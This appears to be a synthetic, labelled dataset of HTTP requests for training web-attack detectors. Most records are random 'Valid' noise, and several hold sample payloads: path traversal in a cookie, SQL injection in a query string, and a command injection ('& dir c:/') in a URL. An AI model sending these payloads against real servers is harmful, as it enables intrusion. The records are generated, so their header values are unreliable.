GET /hVgp/s4FNfFw8-_Z12m@CJ/e9ertapc/eQ2N7pds/tmpZVvpkqPscript/Maccepty5ATtC5ndsock_streamE_/oNeon7aa3/03cd/eWRKWHjur.shtml?4lfgileisopsex=10326600 HTTP/1.0
Host: 161.30.219.37
Connection: e3av
Accept: image/*;q=0.5, video/quicktime;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 178.182.23.22
Cookie: qrXo@ElU9=2529001;nei=dthQGDB;Ini6=lOEGr-F;sdiarrtlone=aRmN ;OOo=91667895
Cookie2: $Version="09"
Date: Wed, 07 Sep 05 08:42:20 GMT
ETag: W/"M9t8DD@o-zTu.EpUwd"
Expect: 100-continue
From: x0tmarT@bobht4e.cz
If-Modified-Since: Wed, 05 Nov 08 07:19:19 UTC
If-Unmodified-Since: Sat, 13 Nov 04 19:06:59 UTC
If-Match: "THlAu8bzBsoWuRfC"
If-None-Match: "mtNyy1ems-qUZ0TyKaM"
If-Range: Fri, 31 Aug 07 19:30:23 CET
Max-Forwards: 5
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ZU90Z3Jlb29USHRCc2VpM0U3eG9pYU9lamNicXNpNG5rYW9UZGJIZW95dGlB
Authorization: i5weot ptai5=txtr
Range: 8-722814,6-94517
Referer: /feuni/uruhruEh.pl
TE: deflate;q=0.2
Trailer: Accept
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 1.3; oi-0a; rv:3.9.1) Gecko/89830006
UA-CPU: 68000
UA-Disp: 973,9699,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2222x203
Via: HTTP/9.4 www.otaadet.shtml, 2.5 www.tna1h.jpg, 2.0 www.kion.tiff
Transfer-Encoding: identity
Upgrade: tlAedr/6.6, ae8or/3.2, l0c2rn/3.3, t3stse/1.9
Warning: 313 186.195.120.106:4823 "b8aeeymneearynPtNo" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 142489460894
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18526
Start - Id: 18003
class: Valid
GET /mZapetOmjy7qnnOsT3i2/IdNcLBsXeYML/xxXpTsmeSRGtS-6a5k/egDw3RrDzwCEm/eaXCCNQqTbni_M.sh?B35sj7ft=atetez2cuthni&Br6t=uDk3n%40Gb&tuthdnoUhebi7=ednIithtduttfn&ryiobpsT=al%7Ea&sineeeetnx6eqh=845816&iea=062397&rgcjiorrh=939&uincludeXoD7=899&ycyrheserof=%27eFb%27oou-%5Bezonyed&ei6uelsd=+-T+s&2Eh9ha=nao&eDlis7roieN55ee=-mnue&s0=OAcle&CN02PDNbi35=d1ej73lEfiienahH&tmKMa=5544198485 HTTP/1.0
Host: 184.17.49.25:86
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hssyQot-o3ayeeg;q=0.6, oefQl-0ir;q=0.6, yt-R2naunn;q=0.6, o8r-ryrsuINf;q=0.8
Cache-Control: no-store
Client-ip: 65.234.104.69
Cookie: ndo0ocsininvatr=1tnatntmjnq7a;7sgnye=Ts'os
Cookie2: $Version="288"
Date: Wed, 30 Jul 08 17:26:30 UTC
ETag: W/"AsOTb4XXEvw.NpcyMA2a"
Expect: vlOh=llhant
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Sun, 13 Jan 08 06:53:00 CET
If-Unmodified-Since: Fri, 11 Jun 04 18:52:21 UTC
If-Match: *
If-None-Match: *
If-Range: "xviW6jW0VIFb.t5"
Max-Forwards: 8732
MIME-Version: 0.7
Pragma: qoetO=aTc
Proxy-Authorization: Digest uri=http://ksSrmna.ch/he8c/tvrHsfIh/uruss.mp3
Authorization: Basic bmhyRUlzOmNpZHo=
Range: -44534,46459-4352,54-118133
Referer: http://emrwegm.be/kcwuehvd/r7lnwnl/esEenSh/sagr1ti.php
TE: trailers,trailers
Trailer: Range
User-Agent: 3eslbeprrdfneureege
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 642x5791
Via: 2.7 103.72.76.9:84
Transfer-Encoding: deflate
Upgrade: oaieq/9.9, Ohs/6.4, yteh4/6.6, vtnwf0/9.1, eeni/8.8
Warning: 889 5.120.85.203 "9rtkuasOfesmcdebau" "Sat, 25 Oct 08 02:32:29 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 0854075520980249
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18003
Start - Id: 6949
class: Valid
PUT /e_T__XDU6FOEOfBiFyO/Rwgh/aV0m6IPHD2@..png? HTTP/1.0
Content-Length: 42
Content-Language: eBhKd,tzoees,eseq
Content-Encoding: deflate
Content-Location: http://www.qncet.cz/ee5oepa/gomThy5/tnolo.mspx
Content-MD5: dGE5YWVkYWl3aW9sYWFldA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 24:33:31 GMT
Last-Modified: Fri, 14 Aug 09 08:21:21 UTC
Host: www.oTt73jdtir.org
Connection: eVrtau33
Accept: application/zip;q=0.0, text/*;q=0.9, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: qE-nmOyiidJ;q=0.9, sfiecex3-hnml0dr, rhiaz8-dierltS;q=0.8, r-e, xnhz-elhihi;q=0.9
Cache-Control: max-stale
Client-ip: 31.221.241.75
Cookie: Tkehe6nf=89tesmiteEq ljn;IawEueool=71004595;rtnItetleo=170973;Ihyyeew=5378;snaehethtnb=elstylev5uhorepo
Cookie2: $Version="3"
Date: Tue, 27 Jan 04 17:12:13 GMT
ETag: "Ugstsb8LTAN9nmu2"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Tue, 03 Feb 04 14:05:26 GMT
If-Unmodified-Since: Tue, 30 Mar 04 18:46:28 UTC
If-Match: "0h7rcqVZ.2WbADt"
If-None-Match: *
If-Range: "fJPd.EtBtZoWAZ1DT"
Max-Forwards: 662
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: cese6e 2rky=stme
Range: -35,310954-4,-65030
Referer: http://ueieUeaa.biz/adzho/hoetee/moeep.txt
TE: gzip;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 3.9; f7-or; rv:2.3.1) Gecko/48746568
UA-CPU: 68000
UA-Disp: 597,002,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4971x673
Via: taah/3.0 86.209.152.61:753, 8.7 242.189.144.174, HTTP/9.4 147.90.26.115:5925
Transfer-Encoding: nsei
Upgrade: nsobNi/4.6
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DkaWrElgszh=&thrpldocumentor;0'tt]

End - Id: 6949
Start - Id: 10057
class: Valid
GET /ik2z6id583uBgmJT.k/ioao8a/d4/2n.swf?tsae0scren=93851&V9tEIabZj.RP=9&K80N=uxD&QhtpassBO7YRFDXl=2euhcql&hanfxl=12&itaeec=eYex&heisaSird0hmexs=+ HTTP/1.0
Host: 66.20.174.153:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: o4s-t;q=0.0, dyceGhi-cuoXL;q=0.6, ns-iSpna, Iaigrya-wgNt;q=0.5
Cache-Control: only-if-cached
Client-ip: 147.238.219.210
Cookie: lJGwhereJ9JXKcS6=nd4i]bgur
Cookie2: $Version="6"
Date: Sat, 15 Jan 05 02:31:32 UTC
ETag: W/"e7aZ8e6NNz9mqyn0R9"
Expect: hedstDad
From: aemYeste@u736nnw.biz
If-Modified-Since: Tue, 23 May 06 19:09:19 GMT
If-Unmodified-Since: Tue, 28 Oct 08 21:08:47 UTC
If-Match: *
If-None-Match: "BiAx72EMtGrF39Dm"
If-Range: *
Max-Forwards: 10
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=7042F6FA
Authorization: Basic azEzaWg6c1lmNXg=
Range: 312215-014657
Referer: http://glsacoi.it/1ialnsp/nHk3drs7/1wnihprR.cgi
TE: trailers,chunked;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 7.6; ck-do; rv:5.2.1) Gecko/42782782
UA-CPU: PowerPC
UA-Disp: 3720,8490,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1796x089
Via: 3.4 www.7ohe8.shtml, 6.1 132.55.165.141
Transfer-Encoding: identity
Upgrade: odhn/5.9, rOmU/0.6, etCeis/4.4, iottop/5.2, scqrL/2.8
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 905480693565962672
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10057
Start - Id: 23442
class: Valid
GET /cbrx/sEqYBrKq/BinputFEbgsoundexecDV/Ttt/rm5/0LfecYoranbspihigA/eNba9.mspx? HTTP/1.0
Host: www.o5lb4p.com:80
Connection: ete4y
Accept: */*;q=0.7
Accept-Charset: euc-tw;q=0.8, iso-8859-8;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 116.67.243.172
Cookie: ieeTgoTasrtnaO=services56omtndron+n
Cookie2: $Version="4"
Date: Fri, 29 Apr 05 19:34:18 UTC
ETag: W/"aqOu1yoJkDVVl12BQsul"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Tue, 10 Mar 09 09:06:36 GMT
If-Unmodified-Since: Sun, 26 Aug 07 03:26:17 GMT
If-Match: *
If-None-Match: "tdyOZ8sfLEjovP77yyf"
If-Range: Tue, 02 Jun 09 04:04:18 UTC
Max-Forwards: 049
MIME-Version: 3.9
Pragma: eb='Opar'
Proxy-Authorization: Digest username="eru4bt"
Authorization: Digest uri=/sEev/xaos.doc
Range: 47922-,-4850
Referer: http://Ouzirl.st/iafe.gz
TE: chunked
Trailer: Range
User-Agent: irerma (hw73tq7@W)
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23442
Start - Id: 16898
class: Valid
GET /r0hcEoaImsnlGaoemwrm/lugsdep/pz8rdV.wz3.CbT/ul/s1.bXlOFkqZLG1G/eedo5asm5DmtT/cq/e.wORYdIjASaDgC-e4af/caF@Yaurv/oPebt0eHnerhr/eooreuc2iod/HFsamWZuIreplaceB.css? HTTP/1.1
Host: 157.55.152.21:7
Connection: y78brsjT
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate, gzip, identity, gzip
Accept-Language: *;q=0.1
Cache-Control: max-stale=7
Client-ip: 205.18.127.106
Cookie: mhbaIiou3n=tss;zlsmIShareIoha=IhrJedi;5iit=7674
Cookie2: $Version="259"
Date: Sun, 08 Oct 06 05:31:52 UTC
ETag: "jmQGa4xHf2Ya1mG"
Expect: I2pa=smtbiean
From: yiuaci@ehiEp.org
If-Modified-Since: Thu, 11 Jun 09 08:20:08 UTC
If-Unmodified-Since: Sun, 28 Dec 08 04:22:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 766
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM dExKZXN1MGlpb2J0YW15YXQyc2V0dXNhdGR4dGVhZWFvY3U=
Range: -3548,6-
Referer: http://www.iptta0.de/tsnuk/ryhe/eaAiruyg/rhscEtt0.zip
TE: chunked,trailers
Trailer: Referer
User-Agent: neor (jovVw1; lD-i.sH; dB9ry06)
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: 7.5 122.65.69.132, HTTP/8.5 213.226.3.164:2, 8.5 www.L6ti.shtml
Transfer-Encoding: deflate
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 144.164.88.102
X-Serial-Number: 81135810517
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16898
Start - Id: 32208
class: Valid
GET /3kH/ar/tIuricee802istrfaddc/nMy9SdkKvrRQE_CeUS/edeletai9/fBp_vxKsystemVMe/fh/a3aryVn7l.tiff?irRRmqf8h=seoatbnusriframepa+stdin&nfg0w=lS_7p&psRS90j=epZSz&gcyDjten=uhdstdine8v%3FreckawgetgrcpIt&seescrpt=eET3bu5 HTTP/1.1
Host: www.zGlzu5.org
Connection: ioen
Accept: */*;q=0.5
Accept-Charset: windows-874, euc-kr, x-mac-hebrew
Accept-Encoding: *
Accept-Language: oceliuhf-qIt;q=0.8, dlAsc-tesbe;q=0.3, oShr-ir0pfdoE;q=0.0, uahe-yrnmlb;q=0.4
Cache-Control: max-stale
Client-ip: 73.140.187.64
Cookie: aeTordsEbe=dWMi.V
Cookie2: $Version="60"
Date: Tue, 11 Mar 08 21:30:13 GMT
ETag: W/"hS5or9k73q@J-Il"
Expect: 100-continue
From: 4otr@3vspnPy.com
If-Modified-Since: Thu, 31 Aug 06 18:24:14 CET
If-Unmodified-Since: Tue, 18 Oct 05 08:05:55 CET
If-Match: *
If-None-Match: "weir1KGW2kfeKue_"
If-Range: *
Max-Forwards: 071
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM bmU2ZWU5ZWRiSGZPbmtobGxHb2JzbkF3dGFydXJhb29ycw==
Authorization: NTLM bnR0NTlEcGlyZTE4YW1pdGlhdGVxb250ZjFpdHVmZW90MWFzZGVyaDdjdG4wZQ==
Range: -31011,02795-
Referer: http://rhettEE.com/OissTe/uetMm/neca/i9nepl.php4
TE: gzip;q=0.4,trailers,deflate
Trailer: Range
User-Agent: nqlIqoYs http://www.fd6lasi.uk
UA-CPU: 68000
UA-Disp: 666,662,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9868x2835
Via: rLhh/7.8 www.FcOas.js
Transfer-Encoding: gzip
Upgrade: wahas/0.3, g2i27/7.9, nondad/8.9, en7/2.8, tgms/5.0
Warning: 465 144.103.243.13 "dfhVber4aysot1d" 
X-Forwarded-For: 122.80.70.14
X-Serial-Number: 76488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32208
Start - Id: 29070
class: Valid
GET /qhuehk5crruaeit7/i8Ytva7t1snairL2dr/eeroaoutnftjf08f3/S9.htm? HTTP/1.1
Host: 249.109.142.45
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: re6haswv=0
Client-ip: 144.134.39.207
Cookie: 2tsicDyr7eemf=803135110;srrceyen2ne=jjTezOel;tAto5thqf=haound3n|zmt;sommwetnSmafP=Osan;rOuietdhuhsUq=tuagrk;toxmloyVh.jH=lqy
Cookie2: $Version="36"
Date: Wed, 28 Mar 07 20:13:36 CET
ETag: "znuW.eAT.4Wbvxp"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Wed, 30 Jan 08 20:10:48 GMT
If-Unmodified-Since: Thu, 22 Jan 09 24:01:28 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 31 May 08 22:08:50 CET
Max-Forwards: 095
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic bml1Y3JoU3Q6dHNkdA==
Range: 2-728395,2-644,-332
Referer: http://ublnsbdt.com/c3atats/eeacnl/rtpwcpe/ahse.jpeg
TE: chunked;q=0.5,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/3.4 (Windows; U; Win98 2.2; pa-sh; rv:1.3.5) Gecko/30655271
UA-CPU: x86
UA-Disp: 7928,6331,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 890x9958
Via: HTTP/0.4 www.bttaL.htm:0965, HTTP/9.3 www.swlmn.css
Transfer-Encoding: gzip
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 843 www.oliiele.js "euhes5" "Fri, 21 Dec 07 22:47:13 GMT"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29070
Start - Id: 45030
class: PathTransversal
POST /_NPTclocationIWTUmNsU/aIleEardntstexthuh/sSk3/er2qotlsnn0o3m/nPnp65uDlBG0af_oBB2/graTriaDgrjiBq/lqrj/eJBc3tK5.GL1PQ/rOeesaiois/Znc/d7mUamV5.swf? HTTP/1.0
Content-Length: 77
Content-Language: kfjEa,V,6hdhmnet
Content-Encoding: deflate
Content-Location: /y21s/rEy3rsC/jsUthdz.pl
Content-MD5: ZUp4aHFhdUFvc3REdWF0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 15:00:59 GMT
Last-Modified: Thu, 01 Nov 07 17:02:32 GMT
Host: 124.55.76.67:80
Connection: close
Accept: application/x-tar, text/xml;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: e-itaavw7r;q=0.6, tsbod-isaIm;q=0.9, Sr1-vehtyaL, riblyxom-eysnem;q=0.2, 4Omaon-r;q=0.9
Cache-Control: only-if-cached
Client-ip: 22.24.231.229
Cookie: eSCitlcfoqbs3=iietl;del=7905;OttsiesaEs2yjHT=file:///a:/gt/z2/oniga.xml;ggnenejti6in0Nt=85
Cookie2: $Version="0"
Date: Thu, 10 Apr 08 19:15:36 UTC
Expect: univ26=Asds
If-Modified-Since: Mon, 25 Sep 06 24:21:40 GMT
If-None-Match: *
If-Range: Mon, 31 Aug 09 07:10:33 UTC
Max-Forwards: 2671
Pragma: l='eo'
Authorization: Basic YmZKcXRpcGg6b3ByTGVFM3M=
Range: 963-587349
Referer: http://2rnyf.biz/eurii/79tinuo.cfm
TE: trailers,chunked;q=0.8
User-Agent: lannteprhkaoonvRiat
Via: Vee/9.5 www.snooy.htm, FTP/6.8 www.ttoln.gif
Transfer-Encoding: compress
Upgrade: aajI/8.4, aEpT/8.8
Warning: 356 183.89.97.198 "1std" "Sun, 18 Jul 04 06:45:57 GMT"
X-Forwarded-For: 206.19.206.22
X-Serial-Number: 8285555437517823
----: ---------------

htaccesZhavingheG=sWyepyral&ih@&eHup=3531272721&lnonhietes=feaiealnmReuie

End - Id: 45030
Start - Id: 41592
class: SqlInjection
GET /US/JkoxVDl5oRu/eD87FPH/e.DqmIVq4_.css?roLeissimeer=1&ueefRstqw2edi=-n&nuRte7xwtesi=%27+++++OR+++%27tlIrakheh%27+++++LIKE+++%27aze%2525&28d=8tsRE0rowgrdp&6sfy8et=szRltcz%402r&eosrlastenttrE=rfadh&Fyty=1996&tuqu5n=%25%26+hibande%28lvbscriptlscs+t4ya&eefnslEa=328&oyh7bRel01e4isb=130Pa8Ulq%40C&amharc=76gfeoRXtN&etnOjlht=136&thS4omosip4lh=882199&tin=nnissN2tlomje%3F%7Cg&76UyE=7 HTTP/1.1
Host: 121.22.224.99:9
Connection: 3t8e
Accept: */*;q=0.7
Accept-Charset: iso-8859-15;q=0.4, iso-8859-6;q=0.4, windows-1250;q=0.2, windows-1253;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: eel-ateAipag, n8-hers;q=0.1, i7iibB-b, trxpe-a;q=0.9
Cache-Control: max-stale=9
Client-ip: 234.115.185.119
Cookie: cibo=jbY9;wlcopyzexecTUN62rz=euFdR76k;8dnuee=eneo;aN1Nlhi=763
Cookie2: $Version="675"
Date: Tue, 06 Jan 09 17:48:19 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: ooo5ew=tpn5a
From: i1sE8ei@cmnqea.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Wed, 12 Aug 09 24:13:39 GMT
If-Match: "ahuKAN-.KIDr2k9Abc@"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Sat, 16 May 09 10:03:13 GMT
Max-Forwards: 29
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d0D8Cc0E
Authorization: Digest qop=auth-int
Range: 7594-
Referer: /daemddde/36n1xtF/6mai2y.bin
TE: trailers
Trailer: If-Range
User-Agent: cstie8a
UA-CPU: StrongARM
UA-Disp: 942,115,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4149x276
Via: 1.6 103.244.78.247
Transfer-Encoding: gzip
Upgrade: nmx/9.3, ydSwut/0.9
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41592
Start - Id: 16924
class: Valid
GET /bHv.4REkJlbKqJed-DF/jqEmzG9diIVgCQk/tRpnliotzeiiiZhia/i8vFNpmDiazlxph/rOfM1q7gVKKHymsbT-l/obe3o/9zinivisVsKlA7uih7h/iB66eo8S_32_/70gnc3FRMRboot.iniQhttp/x6i8/ate.png?HshutdownehmochaHM=hmmailftp&e9iVakniah=iE%22vn%22tasem&biincmf2e6=hd3s_&tesotnfdletbE=2&5WG5Qstdin.Lq=Wlttyta&Ictmhs=rreHOnOe&rgebia=2085680&xfoomhauh6stoo=9354 HTTP/1.0
Host: 251.181.137.12
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-4, iso-8859-3, x-mac-icelandic, windows-1253, iso-8859-3
Accept-Encoding: deflate, identity, compress
Accept-Language: *
Cache-Control: bhrod7=aaoe
Client-ip: 101.165.225.244
Cookie: yeocaeblr=r60;dro= 
Cookie2: $Version="79"
Date: Tue, 29 Jun 04 05:53:41 UTC
ETag: "1s6IS1dfleBo9-at8v"
Expect: etn3eon
From: Teqasoh@Osflq.de
If-Modified-Since: Sat, 21 May 05 22:41:34 CET
If-Unmodified-Since: Sat, 16 Jan 10 15:19:05 GMT
If-Match: *
If-None-Match: "1E@idu9l67@.P9KMVF"
If-Range: "rW@KY8JAKnbIbMR7_"
Max-Forwards: 81
MIME-Version: 2.3
Pragma: nEOsei=t2d
Proxy-Authorization: ilera ftnruhuo=doFpte
Authorization: Basic ZWVlbmdzdjpjc2xkNjB0
Range: -0120,-1864,5-
Referer: /WA2thK/zgxhe25T/0tsFti/swte.jsp
TE: trailers,chunked;q=0.3
Trailer: Upgrade
User-Agent: t4AV7ehNVx http://www.eodaA.st
UA-CPU: 68000
UA-Disp: 215,6251,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 581x0277
Via: 2.8 144.19.235.245
Transfer-Encoding: deflate
Upgrade: dHed/7.3, olnnat/3.7, o5p/0.1, wnMa/3.1, arrnc/1.6
Warning: 857 163.225.188.126 "yherr" "Tue, 27 Jan 09 20:54:03 UTC"
X-Forwarded-For: 91.82.248.105
X-Serial-Number: 736542
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16924
Start - Id: 45320
class: PathTransversal
GET /eqnXfRv_oyz2Lpd/m09l5vxfw2CjeEE/mmk.html?Cbetween8J=eB8j_&sate=753988868&5g9FVgVJy=2524945 HTTP/1.1
Host: www.e8csnd0el.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip, identity;q=0.6
Accept-Language: ecdzcLE-eal9p3;q=0.9, aua-ss;q=0.5
Cache-Control: no-store
Cookie: BUSeeTAgGgb0a=eAdeNr9sa;mi=2;ln=abeehv;rMtelng=../../../../../../../../../usr/yo.bat;ws3diarwaLiamam=n-ktqxrXv0a;aut6lrRnps4uto=ae3@6_A4Wkx3
Cookie2: $Version="11"
Date: Wed, 12 Nov 08 17:35:05 CET
If-Match: *
If-None-Match: "PK6wZST6838pgVHyuXm"
Pragma: no-cache
Proxy-Authorization: zr7at hIoye4=Rrgn
Referer: /ds0mrsq/aikirfa/aochg/Neaoi.conf
TE: chunked;q=0.2,trailers
User-Agent: eatiilAw/5.9.0.1

null

End - Id: 45320
Start - Id: 30699
class: Valid
GET /fYegsLrna/nd_CFbLb/elc/gDbservicesdivX02Atelnetiframe5BuG/eo/q5kpGJduUOzatkDlxz/Dq2BR@uo5.IbxQ/1gendnoh/kRdocumentLfZI9zjm.css?cwrhslsl7Aeeyvi=3817135&oe9dt7p=7378&asunionjuGMhhC=0%5DlaHho&b7lX24=049 HTTP/1.0
Host: www.mnne5umr.com
Connection: bnTAe2sn
Accept: */*;q=0.0
Accept-Charset: hz-gb-2312;q=0.0, iso-8859-9, macintosh;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: max-age=6276
Client-ip: 188.252.4.241
Cookie: eaosihfwRch=4740;-sk5=exwNW9E;vietnirt=3796459690;mvA5t7kac=aretbol
Cookie2: $Version="2"
Date: Mon, 19 Jan 09 20:13:11 UTC
ETag: "khs@JwNWHSOTJVu"
Expect: plsm
From: aeec@eeAs.fr
If-Modified-Since: Mon, 06 Dec 04 13:05:39 UTC
If-Unmodified-Since: Wed, 18 Apr 07 06:52:22 CET
If-Match: "xhnrNB3VlH.n@PBb3"
If-None-Match: *
If-Range: Tue, 25 Oct 05 11:58:35 UTC
Max-Forwards: 8921
MIME-Version: 7.4
Pragma: iEpveid=iake
Proxy-Authorization: Digest response="2A65cd9EabBC61E562DdDFBfeDaAebf9"
Authorization: 9ocnn fcgt=3uoal3
Range: 17470-
Referer: http://www.eais.ch/cEeeee/Hebai7d.tiff
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.3 (compatible; dah5lrwmd9; Linux i386; tpkm)
UA-CPU: 68000
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7462x1873
Via: 4.1 10.180.187.65:951, 1.8 www.lh8i.htm, ntltec/2.2 157.52.72.206
Transfer-Encoding: hioh
Upgrade: caib/8.0
Warning: 176 13.80.15.132 "eeuoufKlwEfnriC" "Wed, 11 Jul 07 03:21:01 UTC"
X-Forwarded-For: 229.134.94.56
X-Serial-Number: 62673072943112918
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30699
Start - Id: 23727
class: Valid
GET /T0Vw-ngGHT3Ny/obM/a3ntj/hoefnntOtb/tmpygroup by4LNgincludeFhQ5L/1n6e0lNsioBz/3rEo9tswlSctw.js?Nt_%uTupdateHMx=5193643&lh=790213&tsO1hpdot=dbhiincludea&OwKE6T7positionyI3S=9&xnsluuwi4ho=17796&0it3atnn=liemtoere%3F&Ihome8u=464&eecgtzoacedh=56&pedyerp4nremsA=l6stKtX&pitxx1f=8313927&hGL2iuru9ayou=%3Becnattaeew&U0olC6v=68183406&iTd0sD4d=088213927&mo=%3Fc+&o2vsenTaiwHseA=szio HTTP/1.1
Host: 162.130.48.106
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tmrn1l-uyde;q=0.7, or-sr;q=0.1, Augpes-zs00sh, ima-eTEj;q=0.7, hndr95-esdoUhu8
Cache-Control: only-if-cached
Client-ip: 160.211.74.183
Cookie: nhkeeuenHnqcah=sROSw.sX;ie9=01977
Cookie2: $Version="45"
Date: Fri, 30 Dec 05 19:35:41 CET
ETag: W/"XNE2Ei4pOYWMUMOWeFS"
Expect: 5eaegct=lnhupe;l2k2pde=heeiatl
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Wed, 31 May 06 19:38:50 UTC
If-Unmodified-Since: Sat, 13 Jun 09 17:31:26 UTC
If-Match: "JYSHQuLEirc5Csdj@3"
If-None-Match: "izQgh5MStPQToHaG"
If-Range: Thu, 31 Jul 08 07:32:06 CET
Max-Forwards: 624
MIME-Version: 4.4
Pragma: D=ebeaa
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: osenQ ierARit=oorp9
Range: 88-,49-031,14468-474
Referer: http://www.rscsvr.ch/ssbsAe1/vawhuI.exe
TE: trailers
Trailer: Connection
User-Agent: Neahioou (napDoRI; aKNTQrD6xZ; w2nXlS; 2X654ahv5)
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 431x276
Via: 6.2 200.240.125.212:79, 8.5 105.155.161.198
Transfer-Encoding: compress
Upgrade: Oias/7.2, yee/0.3
Warning: 843 www.wgspyi.tiff:2 "uardrdnasUfstccn" "Sat, 28 Aug 04 22:14:21 GMT"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23727
Start - Id: 44392
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 190.192.205.225
Connection: close
Accept: */*
Accept-Charset: euc-tw
Accept-Encoding: *
Accept-Language: hjAon-fnsaXh;q=0.5, eerot6T-slgpai
Cache-Control: no-store
Client-ip: 25.151.126.170
